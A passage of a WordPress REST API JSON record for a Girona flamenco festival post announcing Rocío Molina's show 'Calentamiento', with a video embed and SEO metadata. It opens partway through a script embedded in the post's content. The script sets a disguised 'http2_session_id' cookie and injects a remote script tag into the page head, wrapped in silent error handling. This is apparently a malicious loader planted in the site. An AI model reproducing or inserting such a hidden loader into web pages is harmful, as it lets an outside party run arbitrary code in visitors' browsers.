window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')&#091;0&#093;||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n\t<\/div>\n<\/div>\n\n\n\n\n\t<div class=\"wpb_video_widget wpb_content_element vc_clearfix   vc_video-aspect-ratio-169 vc_video-el-width-100 vc_video-align-left\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t\n\t\t\t<div class=\"wpb_video_wrapper\"><iframe loading=\"lazy\" title=\"&amp;apos;Calentamiento&amp;apos; de Roc\u00edo Molina - Promo\" src=\"https:\/\/player.vimeo.com\/video\/1152522266?dnt=1&amp;app_id=122963\" width=\"1080\" height=\"608\" frameborder=\"0\" allow=\"autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\"><\/iframe><\/div>\n\t\t<\/div>\n\t<\/div>\n\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n","protected":false},"excerpt":{"rendered":"Reserva d'entrades Coorganitzat amb Temporada Alta Roc\u00edo Molina \u201cCalentamiento\u201d:\u00a0Desentumir els m\u00fasculs. Comunicar calor a un cos. Enardir alg\u00fa. Excitar-lo sexualment. Enfervorir-se. Aquestes, entre d\u2019altres, s\u00f3n paraules que el diccionari tria...","protected":false},"author":4,"featured_media":2901,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[122],"tags":[],"class_list":["post-2899","post","type-post","status-publish","format-standard","has-post-thumbnail","category-edicio-2026"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v19.5 (Yoast SEO v27.8) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>FLAMENGI FESTIVAL<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/flamengi.cat\/es\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d Dijous 26 de novembre a les 20h al Teatre Municipal de Girona\" \/>\n<meta property=\"og:url\" content=\"https:\/\/flamengi.cat\/es\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/\" \/>\n<meta property=\"og:site_name\" content=\"FLAMENGI FESTIVAL\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/flamengi.festival\" \/>\n<meta property=\"article:published_time\" content=\"2026-08-29T09:13:09+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-09-01T12:03:56+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/\u00a9-Simone-Fratini.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"799\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Neoserveis\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@flamengif\" \/>\n<meta name=\"twitter:site\" content=\"@flamengif\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Neoserveis\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\\\/\"},\"author\":{\"name\":\"Neoserveis\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#\\\/schema\\\/person\\\/99252030689047d68b309be665c89c41\"},\"headline\":\"ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d Dijous 26 de novembre a les 20h al Teatre Municipal de Girona\",\"datePublished\":\"2026-08-29T09:13:09+00:00\",\"dateModified\":\"2026-09-01T12:03:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\\\/\"},\"wordCount\":1865,\"image\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/flamengi.cat\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/\u00a9-Simone-Fratini.jpg\",\"articleSection\":[\"Edici\u00f3 2026\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\\\/\",\"url\":\"https:\\\/\\\/flamengi.cat\\\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\\\/\",\"name\":\"ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d Dijous 26 de novembre a les 20h al Teatre Municipal de Girona - FLAMENGI FESTIVAL\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/flamengi.cat\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/\u00a9-Simone-Fratini.jpg\",\"datePublished\":\"2026-08-29T09:13:09+00:00\",\"dateModified\":\"2026-09-01T12:03:56+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#\\\/schema\\\/person\\\/99252030689047d68b309be665c89c41\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/flamengi.cat\\\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\\\/#primaryimage\",\"url\":\"https:\\\/\\\/flamengi.cat\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/\u00a9-Simone-Fratini.jpg\",\"contentUrl\":\"https:\\\/\\\/flamengi.cat\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/\u00a9-Simone-Fratini.jpg\",\"width\":1200,\"height\":799},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inici\",\"item\":\"https:\\\/\\\/flamengi.cat\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d Dijous 26 de novembre a les 20h al Teatre Municipal de Girona\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#website\",\"url\":\"https:\\\/\\\/flamengi.cat\\\/\",\"name\":\"FLAMENGI FESTIVAL\",\"description\":\"Festival Flamenc de Girona\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/flamengi.cat\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#\\\/schema\\\/person\\\/99252030689047d68b309be665c89c41\",\"name\":\"Neoserveis\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g\",\"caption\":\"Neoserveis\"},\"url\":\"https:\\\/\\\/flamengi.cat\\\/es\\\/author\\\/neoserveis\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"FLAMENGI FESTIVAL","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/flamengi.cat\/es\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/","og_locale":"es_ES","og_type":"article","og_title":"ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d Dijous 26 de novembre a les 20h al Teatre Municipal de Girona","og_url":"https:\/\/flamengi.cat\/es\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/","og_site_name":"FLAMENGI FESTIVAL","article_publisher":"https:\/\/www.facebook.com\/flamengi.festival","article_published_time":"2026-08-29T09:13:09+00:00","article_modified_time":"2026-09-01T12:03:56+00:00","og_image":[{"width":1200,"height":799,"url":"http:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/\u00a9-Simone-Fratini.jpg","type":"image\/jpeg"}],"author":"Neoserveis","twitter_card":"summary_large_image","twitter_creator":"@flamengif","twitter_site":"@flamengif","twitter_misc":{"Escrito por":"Neoserveis","Tiempo de lectura":"5 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/flamengi.cat\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/#article","isPartOf":{"@id":"https:\/\/flamengi.cat\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/"},"author":{"name":"Neoserveis","@id":"https:\/\/flamengi.cat\/#\/schema\/person\/99252030689047d68b309be665c89c41"},"headline":"ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d Dijous 26 de novembre a les 20h al Teatre Municipal de Girona","datePublished":"2026-08-29T09:13:09+00:00","dateModified":"2026-09-01T12:03:56+00:00","mainEntityOfPage":{"@id":"https:\/\/flamengi.cat\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/"},"wordCount":1865,"image":{"@id":"https:\/\/flamengi.cat\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/#primaryimage"},"thumbnailUrl":"https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/\u00a9-Simone-Fratini.jpg","articleSection":["Edici\u00f3 2026"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/flamengi.cat\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/","url":"https:\/\/flamengi.cat\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/","name":"ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d Dijous 26 de novembre a les 20h al Teatre Municipal de Girona - FLAMENGI FESTIVAL","isPartOf":{"@id":"https:\/\/flamengi.cat\/#website"},"primaryImageOfPage":{"@id":"https:\/\/flamengi.cat\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/#primaryimage"},"image":{"@id":"https:\/\/flamengi.cat\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/#primaryimage"},"thumbnailUrl":"https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/\u00a9-Simone-Fratini.jpg","datePublished":"2026-08-29T09:13:09+00:00","dateModified":"2026-09-01T12:03:56+00:00","author":{"@id":"https:\/\/flamengi.cat\/#\/schema\/person\/99252030689047d68b309be665c89c41"},"breadcrumb":{"@id":"https:\/\/flamengi.cat\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/flamengi.cat\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/flamengi.cat\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/#primaryimage","url":"https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/\u00a9-Simone-Fratini.jpg","contentUrl":"https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/\u00a9-Simone-Fratini.jpg","width":1200,"height":799},{"@type":"BreadcrumbList","@id":"https:\/\/flamengi.cat\/rocio-molina-calentamiento-dijous-26-de-novembre-a-les-20h-al-teatre-municipal-de-girona\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inici","item":"https:\/\/flamengi.cat\/"},{"@type":"ListItem","position":2,"name":"ROC\u00cdO MOLINA \u201cCALENTAMIENTO\u201d Dijous 26 de novembre a les 20h al Teatre Municipal de Girona"}]},{"@type":"WebSite","@id":"https:\/\/flamengi.cat\/#website","url":"https:\/\/flamengi.cat\/","name":"FLAMENGI FESTIVAL","description":"Festival Flamenc de Girona","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/flamengi.cat\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/flamengi.cat\/#\/schema\/person\/99252030689047d68b309be665c89c41","name":"Neoserveis","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g","caption":"Neoserveis"},"url":"https:\/\/flamengi.cat\/es\/author\/neoserveis\/"}]}},"_links":{"self":[{"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/posts\/2899","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/comments?post=2899"}],"version-history":[{"count":4,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/posts\/2899\/revisions"}],"predecessor-version":[{"id":2970,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/posts\/2899\/revisions\/2970"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/media\/2901"}],"wp:attachment":[{"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/media?parent=2899"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/categories?post=2899"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/flamengi.cat\/es\/wp-json\/wp\/v2\/tags?post=2899"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}